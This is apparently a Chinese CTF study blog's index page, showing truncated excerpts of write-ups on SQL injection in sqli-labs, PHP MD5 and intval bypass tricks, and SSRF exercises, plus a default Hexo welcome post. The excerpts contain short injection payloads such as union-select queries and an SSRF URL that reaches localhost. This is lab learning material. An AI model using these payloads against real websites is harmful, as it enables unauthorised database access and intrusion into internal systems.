联合注入
Less-11.我们可以使用\(转义字符)来判断SQL注入的闭合方式,判断注入类型。
分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。
12?id=1\#本题\后面是'
2.我们再试试注释符,有回显
1?id=1' --+
3.找出列数
12?id=1' order by 3 --+#当我们查询到4的时候,出现报错,说明只有3列
4.我们需要继续找出显示位
12?id=-1'union select 1,2,3--+#第2,3列是显示位
5.爆出数据名和版本号
1?id=-1 ...
level2PHP代码执行函数PHP中常见的命令执行函数与代码执行函数_命令执行类似eval的有那些函数-CSDN博客
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364include ("get_flag.php");global $flag;session_start(); // 开启 session/*# -*- coding: utf-8 -*-# @Author: 探姬# @Da ...
MD51,
1234$a=$_GET['a'];$b=$_GET['b'];if (!($a!==$b && md5($a)===md5($b))) die('no');
数组绕过
2,
1234$a=(string)$_POST['c'];$b=(string)$_POST['d'];if (!($a!==$b && md5($a)==md5($b))) die('no');
123456789101112131415161718 ...
PHP特性CTF中常用PHP特性总结 - gxngxngxn - 博客园
web89123456789101112include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ e ...
SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。
ssrf就是利用我们可以访问到的服务器,对其服务器下面的内网进行探测,也可以理解为服务器拥有外网ip,而我们要访问的电脑则是在公网ip进行nat后分配的内网ip
在ctfhub上练习和学习了ssrf
第一部分【1】内网访问1?url=127.0.0.1/flag.php
【2】伪协议读取文件SSRF利用的协议
(1) ...
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo ser ...